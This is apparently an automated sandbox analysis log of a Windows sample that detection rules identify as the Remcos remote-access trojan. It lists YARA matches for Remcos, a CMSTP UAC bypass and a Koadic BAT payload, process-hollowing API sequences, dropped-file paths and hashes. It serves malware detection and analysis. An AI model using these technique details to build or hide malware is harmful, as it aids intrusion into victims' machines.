              Source: 16.1.nmfsxfjX.pif.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 6.1.nmfsxfjX.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 6.1.nmfsxfjX.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 6.1.nmfsxfjX.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 10.1.nmfsxfjX.pif.400000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 10.1.nmfsxfjX.pif.400000.3.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 10.1.nmfsxfjX.pif.400000.3.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 6.1.nmfsxfjX.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 6.1.nmfsxfjX.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 6.1.nmfsxfjX.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 16.1.nmfsxfjX.pif.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 16.1.nmfsxfjX.pif.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 16.1.nmfsxfjX.pif.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 00000000.00000003.2139310911.000000007E9D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 0000000A.00000001.2293209618.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000000.00000002.2163236530.000000007EA60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 0000000A.00000001.2293209618.0000000000490000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 0000000A.00000001.2293209618.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 0000000A.00000001.2293209618.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 0000000A.00000001.2293209618.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 00000010.00000001.2559054856.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000010.00000001.2559054856.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 00000010.00000001.2559054856.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 00000006.00000001.2139650597.0000000000490000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000010.00000001.2559054856.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000010.00000001.2559054856.0000000000490000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: udVh4Ist4Z.exe PID: 2056, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: nmfsxfjX.pif PID: 5000, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: nmfsxfjX.pif PID: 6400, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: nmfsxfjX.pif PID: 2420, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: C:\Users\Public\Libraries\XjfxsfmnO.bat, type: DROPPEDMatched rule: Koadic post-exploitation framework BAT payload Author: ditekSHen
              PE file contains section with special chars
              Source: netutils.dll.0.drStatic PE information: section name: .
              Source: netutils.dll.0.drStatic PE information: section name: .
              Source: netutils.dll.0.drStatic PE information: section name: .
              Source: netutils.dll.0.drStatic PE information: section name: .
              Source: netutils.dll.0.drStatic PE information: section name: .
              Source: netutils.dll.0.drStatic PE information: section name: .
              Source: netutils.dll.0.drStatic PE information: section name: .
              Source: netutils.dll.0.drStatic PE information: section name: .
              Source: netutils.dll.0.drStatic PE information: section name: .
              Source: netutils.dll.0.drStatic PE information: section name: .
              Source: netutils.dll.0.drStatic PE information: section name: .
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeCode function: 0_2_02D7C3F8 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,0_2_02D7C3F8
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeCode function: 0_2_02D7C368 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,0_2_02D7C368
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeCode function: 0_2_02D7C4DC RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,0_2_02D7C4DC
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeCode function: 0_2_02D77AC0 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary,0_2_02D77AC0
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeCode function: 0_2_02D77968 GetModuleHandleW,GetProcAddress,NtAllocateVirtualMemory,0_2_02D77968
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeCode function: 0_2_02D77F48 CreateProcessAsUserW,GetThreadContext,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,Wow64SetThreadContext,NtResumeThread,0_2_02D77F48
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeCode function: 0_2_02D7C3F6 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,0_2_02D7C3F6
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeCode function: 0_2_02D77966 GetModuleHandleW,GetProcAddress,NtAllocateVirtualMemory,0_2_02D77966
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeCode function: 0_2_02D77F46 CreateProcessAsUserW,GetThreadContext,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,Wow64SetThreadContext,NtResumeThread,0_2_02D77F46
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 6_1_004132D2 OpenProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,GetFinalPathNameByHandleW,CloseHandle,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle,6_1_004132D2
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 6_1_0041BB09 OpenProcess,NtSuspendProcess,CloseHandle,6_1_0041BB09
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 6_1_0041BB35 OpenProcess,NtResumeProcess,CloseHandle,6_1_0041BB35
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFCode function: 8_2_02DAC4DC NtOpenFile,NtReadFile,8_2_02DAC4DC
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFCode function: 8_2_02DA7968 NtAllocateVirtualMemory,8_2_02DA7968
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFCode function: 8_2_02DA7F48 CreateProcessAsUserW,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,Wow64SetThreadContext,NtResumeThread,8_2_02DA7F48
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFCode function: 8_2_02DA7966 NtAllocateVirtualMemory,8_2_02DA7966
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFCode function: 8_2_02DA7F46 CreateProcessAsUserW,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,Wow64SetThreadContext,NtResumeThread,8_2_02DA7F46
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 10_1_004132D2 OpenProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,GetFinalPathNameByHandleW,CloseHandle,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle,10_1_004132D2
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 10_1_0041BB09 OpenProcess,NtSuspendProcess,CloseHandle,10_1_0041BB09
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 10_1_0041BB35 OpenProcess,NtResumeProcess,CloseHandle,10_1_0041BB35
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFCode function: 15_2_02E3C4DC RtlDosPathNameToNtPathName_U,NtOpenFile,NtReadFile,NtClose,15_2_02E3C4DC
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFCode function: 15_2_02E37AC0 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary,15_2_02E37AC0
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFCode function: 15_2_02E37968 GetModuleHandleW,GetProcAddress,NtAllocateVirtualMemory,15_2_02E37968
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFCode function: 15_2_02E37F48 CreateProcessAsUserW,GetThreadContext,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,Wow64SetThreadContext,NtResumeThread,15_2_02E37F48
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFCode function: 15_2_02E3C3F6 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,15_2_02E3C3F6
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFCode function: 15_2_02E3C3F8 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,15_2_02E3C3F8
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFCode function: 15_2_02E3C368 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,15_2_02E3C368
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFCode function: 15_2_02E37966 GetModuleHandleW,GetProcAddress,NtAllocateVirtualMemory,15_2_02E37966
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFCode function: 15_2_02E37F46 CreateProcessAsUserW,GetThreadContext,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,Wow64SetThreadContext,NtResumeThread,15_2_02E37F46
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeCode function: 0_2_02D7CA6C CreateProcessAsUserW,WaitForSingleObject,CloseHandle,CloseHandle,0_2_02D7CA6C
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 6_1_004167B4 ExitWindowsEx,LoadLibraryA,GetProcAddress,6_1_004167B4
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 10_1_004167B4 ExitWindowsEx,LoadLibraryA,GetProcAddress,10_1_004167B4
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeCode function: 0_3_02B6265E0_3_02B6265E
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeCode function: 0_3_02B607190_3_02B60719
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeCode function: 0_3_02B613620_3_02B61362
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeCode function: 0_3_02B6134B0_3_02B6134B
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeCode function: 0_3_02B610BD0_3_02B610BD
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeCode function: 0_3_02B614BD0_3_02B614BD
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeCode function: 0_3_02B604A90_3_02B604A9
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeCode function: 0_3_02B6049D0_3_02B6049D
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeCode function: 0_3_02B604850_3_02B60485
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeCode function: 0_3_02B620F20_3_02B620F2
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeCode function: 0_3_02B610D50_3_02B610D5
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeCode function: 0_3_02B610C90_3_02B610C9
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeCode function: 0_3_02B614C90_3_02B614C9
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeCode function: 0_3_02B604250_3_02B60425
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeCode function: 0_3_02B6102E0_3_02B6102E
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeCode function: 0_3_02B620180_3_02B62018
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeCode function: 0_3_02B604190_3_02B60419
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeCode function: 0_3_02B600000_3_02B60000
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeCode function: 0_3_02B6040D0_3_02B6040D
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeCode function: 0_3_02B610450_3_02B61045
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeCode function: 0_3_02B609B00_3_02B609B0
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeCode function: 0_3_02B609BC0_3_02B609BC
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeCode function: 0_3_02B609A40_3_02B609A4
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeCode function: 0_3_02B611EA0_3_02B611EA
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeCode function: 0_3_02B601DE0_3_02B601DE
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeCode function: 0_3_02B615310_3_02B61531
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeCode function: 0_3_02B6153D0_3_02B6153D
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeCode function: 0_3_02B60D380_3_02B60D38
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeCode function: 0_3_02B629530_3_02B62953
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeCode function: 0_3_02B615490_3_02B61549
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeCode function: 0_2_02D620C40_2_02D620C4
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 6_1_0043E0CC6_1_0043E0CC
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 6_1_0041F0FA6_1_0041F0FA
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 6_1_004541596_1_00454159
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 6_1_004381686_1_00438168
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 6_1_004461F06_1_004461F0
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 6_1_0043E2FB6_1_0043E2FB
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 6_1_0045332B6_1_0045332B
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 6_1_0042739D6_1_0042739D
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 6_1_004374E66_1_004374E6
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 6_1_0043E5586_1_0043E558
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 6_1_004387706_1_00438770
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 6_1_004378FE6_1_004378FE
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 6_1_004339466_1_00433946
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 6_1_0044D9C96_1_0044D9C9
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 6_1_00427A466_1_00427A46
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 6_1_0041DB626_1_0041DB62
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 6_1_00427BAF6_1_00427BAF
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 6_1_00437D336_1_00437D33
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 6_1_00435E5E6_1_00435E5E
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 6_1_00426E0E6_1_00426E0E
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 6_1_0043DE9D6_1_0043DE9D
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 6_1_00413FCA6_1_00413FCA
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 6_1_00436FEA6_1_00436FEA
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 7_2_004057B87_2_004057B8
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFCode function: 8_2_02D920C48_2_02D920C4
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 10_1_0043E0CC10_1_0043E0CC
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 10_1_0041F0FA10_1_0041F0FA
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 10_1_0045415910_1_00454159
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 10_1_0043816810_1_00438168
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 10_1_004461F010_1_004461F0
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 10_1_0043E2FB10_1_0043E2FB
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 10_1_0045332B10_1_0045332B
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 10_1_0042739D10_1_0042739D
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 10_1_004374E610_1_004374E6
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 10_1_0043E55810_1_0043E558
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 10_1_0043877010_1_00438770
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 10_1_004378FE10_1_004378FE
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 10_1_0043394610_1_00433946
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 10_1_0044D9C910_1_0044D9C9
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 10_1_00427A4610_1_00427A46
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 10_1_0041DB6210_1_0041DB62
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 10_1_00427BAF10_1_00427BAF
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 10_1_00437D3310_1_00437D33
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 10_1_00435E5E10_1_00435E5E
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 10_1_00426E0E10_1_00426E0E
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 10_1_0043DE9D10_1_0043DE9D
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 10_1_00413FCA10_1_00413FCA
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 10_1_00436FEA10_1_00436FEA
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 12_2_004057B812_2_004057B8
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFCode function: 15_2_02E220C415_2_02E220C4
              Source: Joe Sandbox ViewDropped File: C:\ProgramData\Remcos\remcos.exe 7BCDC2E607ABC65EF93AFD009C3048970D9E8D1C2A18FC571562396B13EBB301
              Source: Joe Sandbox ViewDropped File: C:\Users\Public\Libraries\easinvoker.exe 30951DB8BFC21640645AA9144CFEAA294BB7C6980EF236D28552B6F4F3F92A96
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFCode function: String function: 02E26658 appears 32 times
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFCode function: String function: 02D94824 appears 628 times
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFCode function: String function: 02E24698 appears 156 times
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFCode function: String function: 02E24824 appears 628 times
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFCode function: String function: 02D96658 appears 32 times
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFCode function: String function: 02D94698 appears 156 times
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: String function: 00402213 appears 38 times
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: String function: 004052FD appears 32 times
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: String function: 00434E10 appears 108 times
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: String function: 0040417E appears 46 times
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: String function: 00402093 appears 100 times
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: String function: 00434770 appears 82 times
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: String function: 00401E65 appears 70 times
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: String function: 00401FAB appears 40 times
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: String function: 00411F67 appears 32 times
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: String function: 004020DF appears 40 times
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: String function: 00457A28 appears 34 times
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: String function: 004484CA appears 36 times
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: String function: 004458D0 appears 56 times
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: String function: 004046F7 appears 34 times
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeCode function: String function: 02D66658 appears 32 times
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeCode function: String function: 02D64698 appears 247 times
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeCode function: String function: 02D77BE8 appears 45 times
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeCode function: String function: 02D644A0 appears 67 times
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeCode function: String function: 02D64824 appears 882 times
              Source: C:\ProgramData\Remcos\remcos.exeCode function: String function: 0040A6C4 appears 136 times
              Source: netutils.dll.0.drStatic PE information: Number of sections : 19 > 10
              Source: udVh4Ist4Z.exeBinary or memory string: OriginalFilename vs udVh4Ist4Z.exe
              Source: udVh4Ist4Z.exe, 00000000.00000002.2148072025.0000000002C60000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs udVh4Ist4Z.exe
              Source: udVh4Ist4Z.exe, 00000000.00000002.2162661886.000000001517D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs udVh4Ist4Z.exe
              Source: udVh4Ist4Z.exe, 00000000.00000002.2159718541.0000000014010000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs udVh4Ist4Z.exe
              Source: udVh4Ist4Z.exe, 00000000.00000002.2159718541.0000000014087000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs udVh4Ist4Z.exe
              Source: udVh4Ist4Z.exe, 00000000.00000002.2159718541.0000000014087000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs udVh4Ist4Z.exe
              Source: udVh4Ist4Z.exe, 00000000.00000003.2133857707.000000007EC30000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs udVh4Ist4Z.exe
              Source: udVh4Ist4Z.exe, 00000000.00000003.2133857707.000000007EC30000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs udVh4Ist4Z.exe
              Source: udVh4Ist4Z.exe, 00000000.00000002.2159718541.0000000014027000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs udVh4Ist4Z.exe
              Source: udVh4Ist4Z.exe, 00000000.00000002.2159718541.0000000014027000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs udVh4Ist4Z.exe
              Source: udVh4Ist4Z.exe, 00000000.00000003.2134174462.000000007F130000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs udVh4Ist4Z.exe
              Source: udVh4Ist4Z.exe, 00000000.00000003.2134401693.0000000014E81000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs udVh4Ist4Z.exe
              Source: udVh4Ist4Z.exe, 00000000.00000002.2164505555.000000007F180000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs udVh4Ist4Z.exe
              Source: udVh4Ist4Z.exe, 00000000.00000002.2164505555.000000007F180000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs udVh4Ist4Z.exe
              Source: udVh4Ist4Z.exe, 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs udVh4Ist4Z.exe
              Source: udVh4Ist4Z.exe, 00000000.00000003.2138564063.0000000014E9E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs udVh4Ist4Z.exe
              Source: udVh4Ist4Z.exe, 00000000.00000003.2138564063.0000000014F00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs udVh4Ist4Z.exe
              Source: udVh4Ist4Z.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
              Source: 10.1.nmfsxfjX.pif.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 10.1.nmfsxfjX.pif.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 10.1.nmfsxfjX.pif.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 16.1.nmfsxfjX.pif.400000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
